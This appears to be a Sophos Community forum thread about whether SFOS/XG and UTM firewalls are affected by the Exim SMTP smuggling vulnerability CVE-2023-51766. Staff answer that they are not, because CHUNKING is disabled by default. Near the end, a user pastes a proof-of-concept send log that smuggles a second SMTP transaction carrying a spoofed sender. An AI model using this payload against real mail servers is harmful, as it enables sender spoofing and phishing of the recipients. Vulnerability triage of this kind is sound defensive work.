Hi,
are SOFS and SG UTM affected by CVE-2023-51766 (Sender Spoofing by SMTP)?
This thread was automatically locked due to age.
Important note about SSL VPN compatibility for 20.0 MR1 with EoL SFOS versions and UTM9 OS. Learn more in the release notes.
Hello there,
Thank you for contacting the Sophos Community.
I need to reach out internally to confirm; I will update the post once I hear back or by the end of the day on Tuesday.
Regards,
Hello there,
Thank you for contacting the Sophos Community.
I need to reach out internally to confirm; I will update the post once I hear back or by the end of the day on Tuesday.
Regards,
emmosophos Do you have details for us regarding the Exim vulnerability CVE-2023-51766 and it's impact on the current versions of XG/UTM ?
Hello,
I am still waiting for confirmation on this from the security team. I am expecting to hear back tomorrow or the day after (the latest).
Regards,
I can confirm that the UTM9 vm is vaulnerable to this - have seen some odd behavious with some stuffed emails failing SPF checks, which results in any further items failing.
Hi wlogic & FFin The development review related to CVE 2023-51766 is completed for XG and UTM both OSes and below is the update from the Dev team.
Although both systems use the affected Exim version 4.96, this vulnerability does not affect them. This is because CHUNKING is disabled by default on XG and UTM.
Please refer to this URL for more info - github.com/.../cve-2023-51766
Regards,
Vishal Ranpariya
Technical Account Manager | Sophos Technical Support
Sophos Support Videos | Knowledge Base | @SophosSupport | Sign up for SMS Alerts |
If a post solves your question use the 'Verify Answer' link.
Sure if you can share the logs and a sample smuggled email, that would be helpful. If you can share your exim.conf file that would be even better.
We tested & reproduced the smtp smuggling vulnerability, and confirmed on both SFOS & UTM with default configuration (chunking disabled) they're safe.
Hello,
Adding to what Bobby mentioned, please open a case with Support, submit the Samples and share the Case ID.
You can find the exim.conf file in the following path # cat /var/storage/chroot-smtp/etc/exim.conf
Regards,
Are you sure, you are not using a Header From Spoof attack, which UTM does not cover?
__________________________________________________________________________________________________________________
I don't think so, this was smuggling
poc payload looks something like this
send: sending "From: test@[valid domain #1]co.nz\r" to { exp4 }
send: sending "To: validrecipient@[valid domain #2].co.nz\r" to { exp4 }
send: sending "Subject: 1st email\r" to { exp4 }
send: sending "\r" to { exp4 }
send: sending "1st email content with many others emails\r" to { exp4 }
send: sending "\r" to { exp4 }
send: sending ".\r" to { exp4 }
send: sending "mail FROM:<spoofedvalidrecipient#1@[invalid domain #1].co.nz>\r" to { exp4 }
send: sending "rcpt TO:<validrecipient#1@[valid domain #2].co.nz>\r" to { exp4 }
send: sending "data\r" to { exp4 }
send: sending "From: spoofedvalidrecipient#1@[invalid domain #1].co.nz\r" to { exp4 }
send: sending "To: validrecipient#1@[valid domain #2].co.nz\r" to { exp4 }
send: sending "Subject: Spoofed email #1\r" to { exp4 }
send: sending "\r" to { exp4 }
send: sending "Content of the #1 spoofed email\r" to { exp4 }
send: sending "\r" to { exp4 }
send: sending ".\r" to { exp4 }
poc code (modified) can be found here CVE-2023-51764.sh
Hello,
As mentioned if you want this to be investigated further, please submit the original logs along with your exim.conf file.
Regards,